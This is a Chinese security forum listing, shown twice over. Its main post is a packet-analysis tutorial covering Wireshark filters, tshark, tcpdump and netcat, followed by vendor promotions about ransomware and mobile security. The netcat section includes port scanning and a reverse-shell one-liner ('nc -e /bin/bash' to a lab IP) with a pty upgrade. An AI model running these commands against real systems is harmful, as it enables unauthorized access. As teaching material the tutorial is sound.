网络安全

网络安全

数据包分析基础

编程 peanut 发表了文章 0 个评论 1950 次浏览 2020-11-27 22:51 来自相关话题

以太网网卡混杂模式和非混杂模式: 混杂模式:不管数据帧中的目的地址是否与自己的地址匹配,都接收 非混杂模式:只接收目的地址相匹配的数据帧,以及广播数据包和组播数据包 在数据包的 ...查看全部

以太网网卡混杂模式和非混杂模式:


混杂模式:不管数据帧中的目的地址是否与自己的地址匹配,都接收


非混杂模式:只接收目的地址相匹配的数据帧,以及广播数据包和组播数据包


在数据包的分析中离不开的工具就是wireshark, 这里整理一下重要的几个功能:


统计-捕获文件属性

DemgVs.png


在属性里看到数据包的一些基本属性,如:大小,长度,时间


这里关于时间需要注意,这里显示的第一个分组时间并不一定是这个时间发送的,可能是之前就已经发送了,所以这里的第一个分组的时间和最后的分组时间是我们抓包的开始和结束,并不是这个数据包发送的开始和结束


统计-已解析的地址

这个功能会将数据包中的host和port进行整理展示,如下图所示:


DeuA0J.png


DeuE79.png


统计-协议分级

Deumfx.png


这个可以让非常清楚的看到各个协议在整个数据包中占用的比例,这样对于分析数据包是非常有帮助的。如上图中,整个数据包主要是TCP的数据包,在TCP下面可以看到主要是HTTP


过滤器

wireshark 统计中的协议分级是非常重要的,可以很清楚的看到这次捕获的数据主要是什么类型的。


常用的过滤方法:


ip.src == 127.0.0.1 and tcp.port == 8080

ip.src_host == 192.168.100.108

ip.src == 192.168.199.228 and ip.dst eq 192.168.199.228

如果没有指明协议,默认抓取所有协议数据


如果没有指明来源或目的地址,默认使用src or dst


逻辑运算:not and or


not具有最高优先级,or 和 and 具有相同的优先级,运算时从左到右进行


一些简单的例子:


显示目的UDP端口53的数据包:udp.port==53

显示来源ip地址为192.168.1.1的数据包:ip.src_host == 192.168.1.1

显示目的或来源ip地址为192.168.1.1的数据包:ip.addr == 192.168.1.1

显示源为TCP或UDP,并且端口返回在2000-5000范围内的数据包:tcp.srcport > 2000 and tcp.srcport < 5000

显示除了icmp以外的包:not icmp

显示来源IP地址为172.17.12.1 但目的地址不是192.168.2.0/24的数据包:ip.src_host == 172.17.12.1 and not ip.dst_host == 192.168.2.0/24

过滤http的get请求: http.request.method == "GET"
显示SNMP或DNS或ICMP的数据包: snmp || dns || icmp

显示来源或目的IP地址为10.1.1.1的数据包:ip.addr == 10.1.1.1

显示来源不为10.1.2.3 或者目的不为10.4.5.6的数据包:ip.src != 10.1.2.3 or ip.dst != 10.4.5.6

显示来源不为10.1.2.3 并且目的不为10.4.5.6的数据包:ip.src != 10.1.2.3 and ip.dst != 10.4.5.6

显示来源或目的UDP端口号为4569的数据包: udp.port == 4569

显示目的TCP端口号为25的数据包: tcp.dstport == 25

显示带有TCP标志的数据包:tcp.flats

显示带有TCP SYN标志的数据包: tcp.flags.syn == 0x02

Follow TCP Stream

在抓取和分析基于TCP协议的包,从应从角度查看TCP流的内容,在很多时候都是非常有用的。


D1wOXt.png


通过Follow TCP Stream 可以很容易对tcp对数据进行追踪,同时利用文件导出功能可以很容易看到这段数据中的异常


tshark

tshark 可以帮助我们很容易的对抓包中的一些数据进行整合处理,例如如果我们发现tcp数据包中的urg 紧急指针位有问题,存在异常流量,如果想要快速把数据进行解析,这个时候tshark就是一个很好的工具


tshark -r aaa.pcap -T fileds -e tcp.urgent_pointer | egrep  -vi "^0$" | tr '\n' ','

将过去的数据通过python程序就可以很容易取出


root@kali:~# python3
Python 3.7.4 (default, Jul 11 2019, 10:43:21)
[GCC 8.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> a = [67,84,70,123,65,110,100,95,89,111,117,95,84,104,111,117,103,104,115,95,73,116,95,87,97]
>>> print("".join([chr(x) for x in a]))
CTF{And_You_Thoughs_It_Wa
>>>

NC

netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,


netcat所做的就是在两台电脑之间建立链接并返回两个数据流。


root@kali:~# nc -h
[v1.10-41.1]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
root@kali:~#

下面是关于nc常用功能的整理


端口扫描

root@kali:~# nc -z -v -n 192.168.1.109 20-100
(UNKNOWN) [192.168.1.109] 22 (ssh) open
root@kali:~# nc -v 192.168.1.109 22
192.168.1.109: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.1.109] 22 (ssh) open
SSH-2.0-OpenSSH_6.6.1

Protocol mismatch.
root@kali:~#

可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.


一旦你发现开放的端口,你可以容易的使用netcat 连接服务抓取他们的banner。


Chat Server

nc 也可以实现类似聊天的共能


在server端执行监听:


[root@localhost ~]# nc -l 9999
i am client
i am server
hahahahah

在客户端执行如下:


root@kali:~# nc 192.168.1.109 9999
i am client
i am server
hahahahah

简单反弹shell

在服务端执行:


[root@localhost ~]# nc -vvl 9999
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.1.104.
Ncat: Connection from 192.168.1.104:49804.
ls
a.txt
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
python -c 'import pty;pty.spawn("/bin/bash")'
root@kali:~# ls
ls
a.txt Documents Music Public Videos
Desktop Downloads Pictures Templates
root@kali:~#

客户端执行:


root@kali:~# nc -e /bin/bash 192.168.1.109 9999

这样我们在服务端就得到了客户端的shell权限


同时为了获得交互式的shell,可以通过python简单实现:


python -c 'import pty;pty.spawn("/bin/bash")'


文件传输

nc也可以实现文件传输的功能


在服务端:


[root@localhost ~]# nc -l 9999 < hello.txt 
[root@localhost ~]#

在客户端通过nc进行接收


root@kali:~# nc -n 192.168.1.109 9999 > test.txt
root@kali:~# cat test.txt
hello world
root@kali:~#

加密发送的数据

nc 是默认不对数据加密的,如果想要对nc发送的数据加密


在服务端:


nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt

客户端:


mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567

使用mcrypt工具解密数据。


以上两个命令会提示需要密码,确保两端使用相同的密码。


这里是使用mcrypt用来加密,使用其它任意加密工具都可以。


TCPDUMP

tcpdump 是linux上非常好用的抓包工具,并且数据可以通过wireshark 分析工具进行分析


tcpdump -D 可以查看网卡列表


root@kali:~# tcpdump -D
1.eth0 [Up, Running]
2.lo [Up, Running, Loopback]
3.any (Pseudo-device that captures on all interfaces) [Up, Running]
4.nflog (Linux netfilter log (NFLOG) interface) [none]
5.nfqueue (Linux netfilter queue (NFQUEUE) interface) [none]
6.bluetooth0 (Bluetooth adapter number 0) [none]
root@kali:~#

-c : 指定要抓包的数量


-i interface: 指定tcpdump需要监听的端口,默认会抓取第一个网络接口


-n : 对地址以数字方式显示,否则显示为主机名


-nn: 除了-n的作用外,还把端口显示未数值,否则显示端口服务名


-w: 指定抓包输出到的文件


例如:


抓取到本机22端口包:tcpdump -c 10 -nn -i ens33 tcp dst port 22

​移动互联时代,企业移动安全如何保证

科技前沿 OT学习平台 发表了文章 0 个评论 2321 次浏览 2017-07-24 17:29 来自相关话题

智能手机等移动设备的普及将人们带入了移动互联网时代,同时,移动设备也越来越多的进入到企业办公之中,移动互联网为我们带来便利的同时也引发了关于移动安全的担忧,现在恶意软件以移动设备为依托,肆意传播,所以,控制恶意软件的传播刻不容缓,企业移动安全的问题不可忽视。 ...查看全部
智能手机等移动设备的普及将人们带入了移动互联网时代,同时,移动设备也越来越多的进入到企业办公之中,移动互联网为我们带来便利的同时也引发了关于移动安全的担忧,现在恶意软件以移动设备为依托,肆意传播,所以,控制恶意软件的传播刻不容缓,企业移动安全的问题不可忽视。
众所周知,Android设备相较于IOS设备的漏洞更多,主要是因为Android是一个开源的系统,每个独立的手机商都可以根据自己的需求对Android进行定制,而且应用的审核标准也比较低,这就成了恶意软件利用的目标;随着技术的发展,恶意软件的制作成本也越来越低,导致移动端的攻击行为逐渐规模化,而其主要载体会转向APP和APP插件。
任何智能手机都可以作为一个记录设备,这些设备上的数据泄露只要是因为其硬件可远程操控,另外,移动设备本身也可以作为发起攻击的媒介;攻击者会利用暗藏的恶意软件窃取个人或企业的敏感数据,它可能像间谍一样获取你的回忆记录、数据信息、甚至局域网或者可发现范围内的蓝牙设备的存储数据等。
企业移动安全应该主动防御
在企业移动化的过程中,应尽力确保移动应用的安全,因为企业移动化的很多功能都是基于移动应用来实现,而现在大多数开发者只注重产品的迭代和技术攻破,在应用安全性方面并没有投入太多的资源,这就造成了很大的安全隐患。
企业提升移动安全需要保持积极的态度,先做好员工安全意识教育,培养员工良好的使用移动设备习惯。
其次,企业在选择移动办公产品时,除了注重产品的品质和服务外,还应该注重产品的安全性。随着技术的发展,产品在技术和功能方面的差异越来越容易被复制和超越,而安全性不但是未雨绸缪的超前意识,更是一种负责任的严谨态度。
想要了解更多关于网络安全的知识,敬请关注7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约观看直播>>>

如何防范网络病毒的四点建议

科技前沿 OT学习平台 发表了文章 0 个评论 2509 次浏览 2017-07-21 17:37 来自相关话题

自今年5月爆发wannacry勒索病毒以来,各种蠕虫病毒接踵而至,着实是让世界杀毒市场活了一把,“暗云Ⅲ”,Petya等等,一个比一个厉害,令人防不胜防,即使你染上了病毒也有可能完全不知情。 目前人们并没有养成很好的上网习惯,病毒预防的意识也很差, ...查看全部

自今年5月爆发wannacry勒索病毒以来,各种蠕虫病毒接踵而至,着实是让世界杀毒市场活了一把,“暗云Ⅲ”,Petya等等,一个比一个厉害,令人防不胜防,即使你染上了病毒也有可能完全不知情。
目前人们并没有养成很好的上网习惯,病毒预防的意识也很差,而且大多数用户更倾向于老旧版本的操作系统,以为旧的系统各方面都更加成熟,用起来也顺手,对于系统升级,维护方面有很强的抵触心理。

勒索病毒.jpg


这里OTPUB小编就跟大家分享4个平时生活中预防网络病毒的建议。
1、安装杀毒软件,这一点相信大多数的人都做到了这一点;在使用杀毒软件的时候,建议开始病毒库自动更新,保证杀毒软件可以最快的识别网络上的新型病毒,另外,建议每周至少一次对个人电脑进行一些全盘病毒扫描,确保电脑没有隐藏的病毒。
2、使用基于客户端的防火墙或过滤措施,以增强计算机对黑客和恶意代码的攻击 的免疫力。或者在一些安全网站中,可对自己的计算机做病毒扫描,察看它是否存在安全漏洞与病毒。如果你经常在线,这一点很有必要,因为如果你的系统没有加设有效防护,你的个人资料很有可能会被他人窃取。
3、在使用外接设备(例如U盘,光盘,移动硬盘灯)时,先对其进行扫描,以防万一。
4、不安装来历不明的软件,下载软件要到官方指定的站点下载,切不可贪图省事去一些未知网站,以防下载的软件里面包含电脑病毒。
想要了解更多关于网络安全的知识,敬请关注7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约直播>>>
或扫描下方二维码预约

论坛.jpg


对付勒索病毒,Check Point有秘密武器

科技前沿 OT学习平台 发表了文章 0 个评论 2650 次浏览 2017-07-17 15:57 来自相关话题

WannaCry的阴云还未散去,Petya就已经迫不及待的出现在人们视线之中, 6月27日东欧地区又爆发了新一轮的勒索软件(Petya)攻击事件,受灾最严重的当属乌克兰,大量的政府机构,私人企业遭到了勒索病毒的攻击。 Petya不是一个真正意义上的 ...查看全部
WannaCry的阴云还未散去,Petya就已经迫不及待的出现在人们视线之中, 6月27日东欧地区又爆发了新一轮的勒索软件(Petya)攻击事件,受灾最严重的当属乌克兰,大量的政府机构,私人企业遭到了勒索病毒的攻击。
Petya不是一个真正意义上的勒索病毒,但是其破坏力比之之前的Wanncry更加可怕,Petya不只是锁定特定文件,而是直接对磁盘的MBR下手,篡改MBR导致整个磁盘无法访问。具体来说就是Petya并不加密MBR用于后续的勒索,而是直接破坏前25个扇区,当硬盘的MBR损坏之后,计算机就无法再检索驱动器上的数据了。
而且Petya传播方式利用“永恒之蓝”和“永恒之岩”两个漏洞,这就导致了它可以通过内网渗透使用系统的WMIC和Sysinternals的PsExec传播,所以即便电脑修复“永恒之蓝”漏洞,只要内网有中毒电脑,仍有被感染的危险。
面对目前安全运维管理中存在的问题, Check Point独立安全产品解决方案将助您一臂之力。
7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您打开安全管理的未来发展趋势。Check Point还将免费提供一次Securiy Check Up。抓紧时间预约活动报名。
 
点击此处预约报名>>>

​【直播预告】别再成为勒索软件的“盘中餐”,网络安全刻不容缓!

科技前沿 OT学习平台 发表了文章 0 个评论 2525 次浏览 2017-06-14 11:02 来自相关话题

说到勒索病毒,大家都会不自觉的想到WannaCry。是的,因为,它的爆发真的让好多人哭晕在厕所,而这次网络攻击也达到了“史无前例的级别”。此次勒索病毒,是通过互联网端口输入病毒程序,对重要文件进行加密然后敲诈,攻击目标直接锁定用户的数据,攻击手段竟是原本为了保 ...查看全部
说到勒索病毒,大家都会不自觉的想到WannaCry。是的,因为,它的爆发真的让好多人哭晕在厕所,而这次网络攻击也达到了“史无前例的级别”。此次勒索病毒,是通过互联网端口输入病毒程序,对重要文件进行加密然后敲诈,攻击目标直接锁定用户的数据,攻击手段竟是原本为了保护数据安全的密码技术,这些都提醒人们保护网络安全刻不容缓。
此外,网络病毒存在巨大的获利空间,在一段时间内,可能还会出现更多的变种病毒。因此,我们完全有理由相信,WannaCry只是一个开始。
知己知彼,才能百战不殆,下面O宝就为大家总结下,勒索软件的传播都有哪些途径。
网络钓鱼和垃圾邮件
网络罪犯在邮件正文中加入钓鱼网址链接。 借助网页木马传播,当用户不小心访问恶意网站时,勒索软件会被浏览器自动下载并在后台运行。
水坑式攻击
网络罪犯会将恶意软件植入到企业或个人经常访问的网站之中,一旦访问了这些网站,恶意程序会利用设备上的漏洞对其进行感染。 
捆绑传播发布
借助其他恶意软件传播渠道,与其他恶意软件捆绑发布传播;或者捆绑正常的软件进行传播。
借助移动存储传播
借助U盘、移动硬盘、闪存卡等可移动存储介质传播。
知道了勒索病毒的“套路”,我们要如何“对症下药”当然靠它
Sophos Intercept X下一代端点安全技术,Sophos致力于为企业提供整体安全解决方案,Intercept X 这么牛,还有哪些我们不知道的?想了解更多,看直播!
6月15日14 : 00“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’”直播活动即将开启,Sophos Intercept X,何止看上去这么简单!
活动日程
14 : 00-14 : 05  嘉宾介绍
14 : 05-14 : 20  wannaCry带来的思考
14 : 20-14 : 40  如何从根本防御勒索软件
14 : 40-14 : 50  如何面对更复杂的威胁
14 : 50-15 : 00  互动答疑
点击报名观看直播>>>“眼泪拯救不了企业安全对勒索软件下手就要‘稳、准、狠’

数据包分析基础

编程 peanut 发表了文章 0 个评论 1950 次浏览 2020-11-27 22:51 来自相关话题

以太网网卡混杂模式和非混杂模式: 混杂模式:不管数据帧中的目的地址是否与自己的地址匹配,都接收 非混杂模式:只接收目的地址相匹配的数据帧,以及广播数据包和组播数据包 在数据包的 ...查看全部

以太网网卡混杂模式和非混杂模式:


混杂模式:不管数据帧中的目的地址是否与自己的地址匹配,都接收


非混杂模式:只接收目的地址相匹配的数据帧,以及广播数据包和组播数据包


在数据包的分析中离不开的工具就是wireshark, 这里整理一下重要的几个功能:


统计-捕获文件属性

DemgVs.png


在属性里看到数据包的一些基本属性,如:大小,长度,时间


这里关于时间需要注意,这里显示的第一个分组时间并不一定是这个时间发送的,可能是之前就已经发送了,所以这里的第一个分组的时间和最后的分组时间是我们抓包的开始和结束,并不是这个数据包发送的开始和结束


统计-已解析的地址

这个功能会将数据包中的host和port进行整理展示,如下图所示:


DeuA0J.png


DeuE79.png


统计-协议分级

Deumfx.png


这个可以让非常清楚的看到各个协议在整个数据包中占用的比例,这样对于分析数据包是非常有帮助的。如上图中,整个数据包主要是TCP的数据包,在TCP下面可以看到主要是HTTP


过滤器

wireshark 统计中的协议分级是非常重要的,可以很清楚的看到这次捕获的数据主要是什么类型的。


常用的过滤方法:


ip.src == 127.0.0.1 and tcp.port == 8080

ip.src_host == 192.168.100.108

ip.src == 192.168.199.228 and ip.dst eq 192.168.199.228

如果没有指明协议,默认抓取所有协议数据


如果没有指明来源或目的地址,默认使用src or dst


逻辑运算:not and or


not具有最高优先级,or 和 and 具有相同的优先级,运算时从左到右进行


一些简单的例子:


显示目的UDP端口53的数据包:udp.port==53

显示来源ip地址为192.168.1.1的数据包:ip.src_host == 192.168.1.1

显示目的或来源ip地址为192.168.1.1的数据包:ip.addr == 192.168.1.1

显示源为TCP或UDP,并且端口返回在2000-5000范围内的数据包:tcp.srcport > 2000 and tcp.srcport < 5000

显示除了icmp以外的包:not icmp

显示来源IP地址为172.17.12.1 但目的地址不是192.168.2.0/24的数据包:ip.src_host == 172.17.12.1 and not ip.dst_host == 192.168.2.0/24

过滤http的get请求: http.request.method == "GET"
显示SNMP或DNS或ICMP的数据包: snmp || dns || icmp

显示来源或目的IP地址为10.1.1.1的数据包:ip.addr == 10.1.1.1

显示来源不为10.1.2.3 或者目的不为10.4.5.6的数据包:ip.src != 10.1.2.3 or ip.dst != 10.4.5.6

显示来源不为10.1.2.3 并且目的不为10.4.5.6的数据包:ip.src != 10.1.2.3 and ip.dst != 10.4.5.6

显示来源或目的UDP端口号为4569的数据包: udp.port == 4569

显示目的TCP端口号为25的数据包: tcp.dstport == 25

显示带有TCP标志的数据包:tcp.flats

显示带有TCP SYN标志的数据包: tcp.flags.syn == 0x02

Follow TCP Stream

在抓取和分析基于TCP协议的包,从应从角度查看TCP流的内容,在很多时候都是非常有用的。


D1wOXt.png


通过Follow TCP Stream 可以很容易对tcp对数据进行追踪,同时利用文件导出功能可以很容易看到这段数据中的异常


tshark

tshark 可以帮助我们很容易的对抓包中的一些数据进行整合处理,例如如果我们发现tcp数据包中的urg 紧急指针位有问题,存在异常流量,如果想要快速把数据进行解析,这个时候tshark就是一个很好的工具


tshark -r aaa.pcap -T fileds -e tcp.urgent_pointer | egrep  -vi "^0$" | tr '\n' ','

将过去的数据通过python程序就可以很容易取出


root@kali:~# python3
Python 3.7.4 (default, Jul 11 2019, 10:43:21)
[GCC 8.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> a = [67,84,70,123,65,110,100,95,89,111,117,95,84,104,111,117,103,104,115,95,73,116,95,87,97]
>>> print("".join([chr(x) for x in a]))
CTF{And_You_Thoughs_It_Wa
>>>

NC

netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,


netcat所做的就是在两台电脑之间建立链接并返回两个数据流。


root@kali:~# nc -h
[v1.10-41.1]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
root@kali:~#

下面是关于nc常用功能的整理


端口扫描

root@kali:~# nc -z -v -n 192.168.1.109 20-100
(UNKNOWN) [192.168.1.109] 22 (ssh) open
root@kali:~# nc -v 192.168.1.109 22
192.168.1.109: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.1.109] 22 (ssh) open
SSH-2.0-OpenSSH_6.6.1

Protocol mismatch.
root@kali:~#

可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.


一旦你发现开放的端口,你可以容易的使用netcat 连接服务抓取他们的banner。


Chat Server

nc 也可以实现类似聊天的共能


在server端执行监听:


[root@localhost ~]# nc -l 9999
i am client
i am server
hahahahah

在客户端执行如下:


root@kali:~# nc 192.168.1.109 9999
i am client
i am server
hahahahah

简单反弹shell

在服务端执行:


[root@localhost ~]# nc -vvl 9999
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.1.104.
Ncat: Connection from 192.168.1.104:49804.
ls
a.txt
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
python -c 'import pty;pty.spawn("/bin/bash")'
root@kali:~# ls
ls
a.txt Documents Music Public Videos
Desktop Downloads Pictures Templates
root@kali:~#

客户端执行:


root@kali:~# nc -e /bin/bash 192.168.1.109 9999

这样我们在服务端就得到了客户端的shell权限


同时为了获得交互式的shell,可以通过python简单实现:


python -c 'import pty;pty.spawn("/bin/bash")'


文件传输

nc也可以实现文件传输的功能


在服务端:


[root@localhost ~]# nc -l 9999 < hello.txt 
[root@localhost ~]#

在客户端通过nc进行接收


root@kali:~# nc -n 192.168.1.109 9999 > test.txt
root@kali:~# cat test.txt
hello world
root@kali:~#

加密发送的数据

nc 是默认不对数据加密的,如果想要对nc发送的数据加密


在服务端:


nc localhost 1567 | mcrypt –flush –bare -F -q -d -m ecb > file.txt

客户端:


mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 1567

使用mcrypt工具解密数据。


以上两个命令会提示需要密码,确保两端使用相同的密码。


这里是使用mcrypt用来加密,使用其它任意加密工具都可以。


TCPDUMP

tcpdump 是linux上非常好用的抓包工具,并且数据可以通过wireshark 分析工具进行分析


tcpdump -D 可以查看网卡列表


root@kali:~# tcpdump -D
1.eth0 [Up, Running]
2.lo [Up, Running, Loopback]
3.any (Pseudo-device that captures on all interfaces) [Up, Running]
4.nflog (Linux netfilter log (NFLOG) interface) [none]
5.nfqueue (Linux netfilter queue (NFQUEUE) interface) [none]
6.bluetooth0 (Bluetooth adapter number 0) [none]
root@kali:~#

-c : 指定要抓包的数量


-i interface: 指定tcpdump需要监听的端口,默认会抓取第一个网络接口


-n : 对地址以数字方式显示,否则显示为主机名


-nn: 除了-n的作用外,还把端口显示未数值,否则显示端口服务名


-w: 指定抓包输出到的文件


例如:


抓取到本机22端口包:tcpdump -c 10 -nn -i ens33 tcp dst port 22

​移动互联时代,企业移动安全如何保证

科技前沿 OT学习平台 发表了文章 0 个评论 2321 次浏览 2017-07-24 17:29 来自相关话题

智能手机等移动设备的普及将人们带入了移动互联网时代,同时,移动设备也越来越多的进入到企业办公之中,移动互联网为我们带来便利的同时也引发了关于移动安全的担忧,现在恶意软件以移动设备为依托,肆意传播,所以,控制恶意软件的传播刻不容缓,企业移动安全的问题不可忽视。 ...查看全部
智能手机等移动设备的普及将人们带入了移动互联网时代,同时,移动设备也越来越多的进入到企业办公之中,移动互联网为我们带来便利的同时也引发了关于移动安全的担忧,现在恶意软件以移动设备为依托,肆意传播,所以,控制恶意软件的传播刻不容缓,企业移动安全的问题不可忽视。
众所周知,Android设备相较于IOS设备的漏洞更多,主要是因为Android是一个开源的系统,每个独立的手机商都可以根据自己的需求对Android进行定制,而且应用的审核标准也比较低,这就成了恶意软件利用的目标;随着技术的发展,恶意软件的制作成本也越来越低,导致移动端的攻击行为逐渐规模化,而其主要载体会转向APP和APP插件。
任何智能手机都可以作为一个记录设备,这些设备上的数据泄露只要是因为其硬件可远程操控,另外,移动设备本身也可以作为发起攻击的媒介;攻击者会利用暗藏的恶意软件窃取个人或企业的敏感数据,它可能像间谍一样获取你的回忆记录、数据信息、甚至局域网或者可发现范围内的蓝牙设备的存储数据等。
企业移动安全应该主动防御
在企业移动化的过程中,应尽力确保移动应用的安全,因为企业移动化的很多功能都是基于移动应用来实现,而现在大多数开发者只注重产品的迭代和技术攻破,在应用安全性方面并没有投入太多的资源,这就造成了很大的安全隐患。
企业提升移动安全需要保持积极的态度,先做好员工安全意识教育,培养员工良好的使用移动设备习惯。
其次,企业在选择移动办公产品时,除了注重产品的品质和服务外,还应该注重产品的安全性。随着技术的发展,产品在技术和功能方面的差异越来越容易被复制和超越,而安全性不但是未雨绸缪的超前意识,更是一种负责任的严谨态度。
想要了解更多关于网络安全的知识,敬请关注7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约观看直播>>>

如何防范网络病毒的四点建议

科技前沿 OT学习平台 发表了文章 0 个评论 2509 次浏览 2017-07-21 17:37 来自相关话题

自今年5月爆发wannacry勒索病毒以来,各种蠕虫病毒接踵而至,着实是让世界杀毒市场活了一把,“暗云Ⅲ”,Petya等等,一个比一个厉害,令人防不胜防,即使你染上了病毒也有可能完全不知情。 目前人们并没有养成很好的上网习惯,病毒预防的意识也很差, ...查看全部

自今年5月爆发wannacry勒索病毒以来,各种蠕虫病毒接踵而至,着实是让世界杀毒市场活了一把,“暗云Ⅲ”,Petya等等,一个比一个厉害,令人防不胜防,即使你染上了病毒也有可能完全不知情。
目前人们并没有养成很好的上网习惯,病毒预防的意识也很差,而且大多数用户更倾向于老旧版本的操作系统,以为旧的系统各方面都更加成熟,用起来也顺手,对于系统升级,维护方面有很强的抵触心理。

勒索病毒.jpg


这里OTPUB小编就跟大家分享4个平时生活中预防网络病毒的建议。
1、安装杀毒软件,这一点相信大多数的人都做到了这一点;在使用杀毒软件的时候,建议开始病毒库自动更新,保证杀毒软件可以最快的识别网络上的新型病毒,另外,建议每周至少一次对个人电脑进行一些全盘病毒扫描,确保电脑没有隐藏的病毒。
2、使用基于客户端的防火墙或过滤措施,以增强计算机对黑客和恶意代码的攻击 的免疫力。或者在一些安全网站中,可对自己的计算机做病毒扫描,察看它是否存在安全漏洞与病毒。如果你经常在线,这一点很有必要,因为如果你的系统没有加设有效防护,你的个人资料很有可能会被他人窃取。
3、在使用外接设备(例如U盘,光盘,移动硬盘灯)时,先对其进行扫描,以防万一。
4、不安装来历不明的软件,下载软件要到官方指定的站点下载,切不可贪图省事去一些未知网站,以防下载的软件里面包含电脑病毒。
想要了解更多关于网络安全的知识,敬请关注7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您详解安全管理的未来发展趋势。
点击此处预约直播>>>
或扫描下方二维码预约

论坛.jpg


对付勒索病毒,Check Point有秘密武器

科技前沿 OT学习平台 发表了文章 0 个评论 2650 次浏览 2017-07-17 15:57 来自相关话题

WannaCry的阴云还未散去,Petya就已经迫不及待的出现在人们视线之中, 6月27日东欧地区又爆发了新一轮的勒索软件(Petya)攻击事件,受灾最严重的当属乌克兰,大量的政府机构,私人企业遭到了勒索病毒的攻击。 Petya不是一个真正意义上的 ...查看全部
WannaCry的阴云还未散去,Petya就已经迫不及待的出现在人们视线之中, 6月27日东欧地区又爆发了新一轮的勒索软件(Petya)攻击事件,受灾最严重的当属乌克兰,大量的政府机构,私人企业遭到了勒索病毒的攻击。
Petya不是一个真正意义上的勒索病毒,但是其破坏力比之之前的Wanncry更加可怕,Petya不只是锁定特定文件,而是直接对磁盘的MBR下手,篡改MBR导致整个磁盘无法访问。具体来说就是Petya并不加密MBR用于后续的勒索,而是直接破坏前25个扇区,当硬盘的MBR损坏之后,计算机就无法再检索驱动器上的数据了。
而且Petya传播方式利用“永恒之蓝”和“永恒之岩”两个漏洞,这就导致了它可以通过内网渗透使用系统的WMIC和Sysinternals的PsExec传播,所以即便电脑修复“永恒之蓝”漏洞,只要内网有中毒电脑,仍有被感染的危险。
面对目前安全运维管理中存在的问题, Check Point独立安全产品解决方案将助您一臂之力。
7月25日14:00,Check Point与OTPUB直播平台携手举办的主题为“安全管理的未来发展趋势”直播活动,届时,Check Point资深网络安全顾问谭云老师,将对CheckPoint下一代安全管理体系进行详细阐述,为您打开安全管理的未来发展趋势。Check Point还将免费提供一次Securiy Check Up。抓紧时间预约活动报名。
 
点击此处预约报名>>>

​【直播预告】别再成为勒索软件的“盘中餐”,网络安全刻不容缓!

科技前沿 OT学习平台 发表了文章 0 个评论 2525 次浏览 2017-06-14 11:02 来自相关话题

